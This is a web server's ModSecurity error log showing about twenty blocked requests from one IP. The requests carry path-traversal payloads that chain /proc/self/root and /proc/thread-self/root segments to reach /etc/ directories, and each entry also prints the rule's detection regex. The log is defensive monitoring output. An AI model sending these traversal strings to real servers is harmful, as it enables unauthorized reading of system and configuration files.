[Mon Mar 16 16:42:25.891742 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.243.203:55384] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdIdSswJuvopo3lOhyewAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:28.481945 2026] [:error] [pid 21806:tid 140411599251200] [client 74.7.243.203:55390] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdJNSswJuvopo3lOhygAAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:29.732362 2026] [:error] [pid 10772:tid 140411548894976] [client 74.7.243.203:55392] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdJf9ocpUE4ed4uDwFwwAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:30.886354 2026] [:error] [pid 14895:tid 140411574073088] [client 74.7.243.203:55562] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdJlajLEzk2WiQ-10mfAAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:32.173770 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.243.203:55568] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdKLABkC4fWIHEf8EGZQAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:33.527410 2026] [:error] [pid 10772:tid 140411599251200] [client 74.7.243.203:55574] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdKf9ocpUE4ed4uDwFxwAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:34.969324 2026] [:error] [pid 14895:tid 140411708356352] [client 74.7.243.203:55590] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grep_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdKlajLEzk2WiQ-10mggAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:36.174340 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.243.203:55592] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/geoip.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdLP9ocpUE4ed4uDwFzAAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:37.380986 2026] [:error] [pid 14895:tid 140411607643904] [client 74.7.243.203:55600] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdLVajLEzk2WiQ-10mhAAAApA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:38.801172 2026] [:error] [pid 10831:tid 140411641214720] [client 74.7.243.203:55602] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdLo6lpbStxTqkSkt96AAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:40.006483 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.243.203:55614] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdMLABkC4fWIHEf8EGagAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:41.205328 2026] [:error] [pid 10831:tid 140411716749056] [client 74.7.243.203:35438] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdMY6lpbStxTqkSkt96QAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:42.511904 2026] [:error] [pid 10831:tid 140411557287680] [client 74.7.243.203:35450] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdMo6lpbStxTqkSkt96gAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:43.718712 2026] [:error] [pid 15568:tid 140411699963648] [client 74.7.243.203:35466] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdM6QpVkWug9HeOt9I1wAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:45.049647 2026] [:error] [pid 21805:tid 140411632822016] [client 74.7.243.203:35482] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdNbABkC4fWIHEf8EGbAAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:46.297219 2026] [:error] [pid 15568:tid 140411691570944] [client 74.7.243.203:35488] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdNqQpVkWug9HeOt9I2AAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:47.459450 2026] [:error] [pid 15061:tid 140411616036608] [client 74.7.243.203:35498] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdN6TCbgAP5jq5TehAAQAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:49.201916 2026] [:error] [pid 15568:tid 140411683178240] [client 74.7.243.203:35514] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdOKQpVkWug9HeOt9I2QAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:50.625195 2026] [:error] [pid 14895:tid 140411691570944] [client 74.7.243.203:60134] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdOlajLEzk2WiQ-10mhwAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:51.933673 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.243.203:60146] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdO_9ocpUE4ed4uDwF2gAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:53.142333 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.243.203:60158] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdPdSswJuvopo3lOhyhgAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
